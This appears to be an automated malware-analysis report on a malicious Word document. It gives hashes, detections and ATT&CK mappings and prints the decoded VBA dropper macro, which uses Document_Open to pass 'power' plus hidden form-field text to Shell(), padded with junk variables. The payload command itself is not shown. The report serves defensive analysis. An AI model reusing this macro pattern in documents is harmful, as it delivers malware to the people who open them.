Office (OOXML) malware analysis — malicious · 22779479194409d2

MALICIOUS

Office (OOXML)

61.1 KB Created: 2018-11-29 14:15:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-01-11

MD5: 35c26c71561413b090f353f9a099b6c9 SHA-1: b1b44fafcde5dc74ecf17c4d03b444b476cf4279 SHA-256: 22779479194409d220bf6720bab8db7cba74c90df663c0e9c52866dfdf0b0dc3

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

This OOXML document contains a VBA project with a Document_Open macro. The macro utilizes the Shell() function, which is indicative of downloading and executing a second-stage payload. The specific string 'pow' is concatenated with other strings to form a command, likely for payload execution. The ClamAV detection 'Doc.Dropper.Agent-7144187-0' further supports its nature as a dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-7144187-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7144187-0
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1966 bytes
SHA-256: `5f35caaeb73df94f348da9a6f60415fbab22c843dae0d508b0e60f7a77cddd8d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() fub End Sub Attribute VB_Name = "S2g38TxJ" Sub fub() Dim f1ahsnFLO As Double f1ahsnFLO = 59593.250935206 Dim hm7IJ As Single hm7IJ = 225.53182778669 Dim mkhdY As Double mkhdY = Fix(57362.510041501) Dim W23e4aXC As Long W23e4aXC = Sgn(-29710666) Dim EQ9r7UMWt As Integer EQ9r7UMWt = Sgn(-30480) Dim XsIWga As Boolean XsIWga = True Dim QV6UQI As Double QV6UQI = Fix(54260.339183907) TKjBL8f = "pow" oz5Se7.G8nUYfE7H TKjBL8f + "er" + SLOR9, 0 End Sub Attribute VB_Name = "oz5Se7" Public Sub G8nUYfE7H(PHxupBWF As String, PP8bsXGJT As Integer) Dim E63CcL As Single E63CcL = Sgn(44077.868914691) Dim MKE2VOCJn As Double MKE2VOCJn = Fix(27827.39536875) Dim HwU5eicCu As Single HwU5eicCu = Sgn(35222.491041379) Dim tjYeu As Single tjYeu = Round(54436.23668168) Dim Ep7W4uYIx As Boolean Ep7W4uYIx = False Dim LoNYKv As Single LoNYKv = 32268.717673186 Dim eRnEIt As Boolean eRnEIt = True Shell PHxupBWF, PP8bsXGJT Dim Nu6YO As Integer Nu6YO = Sgn(17043) Dim Mj0gd As Integer Mj0gd = Sgn(21209) End Sub Attribute VB_Name = "hRnP6" Private Function dsOUC() Dim YVIuH7T As Object Set YVIuH7T = New fMain Dim Th9LZvRb As String Th9LZvRb = YVIuH7T.txt.Text dsOUC = Th9LZvRb End Function Public Function SLOR9() ' SLOR9 = dsOUC End Function Attribute VB_Name = "fMain" Attribute VB_Base = "0{675E5D5B-71DD-4218-BB00-43E3E8BA7771}{6BBB73A9-F588-43C6-A000-E4459C08AD51}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	23040 bytes
SHA-256: `fdec61fffeb6fcd173d9818a4fcd8c9353eeff91310ad133f3288568ce5a8f84`

Open this report in the interactive analyzer, or submit your own file for analysis.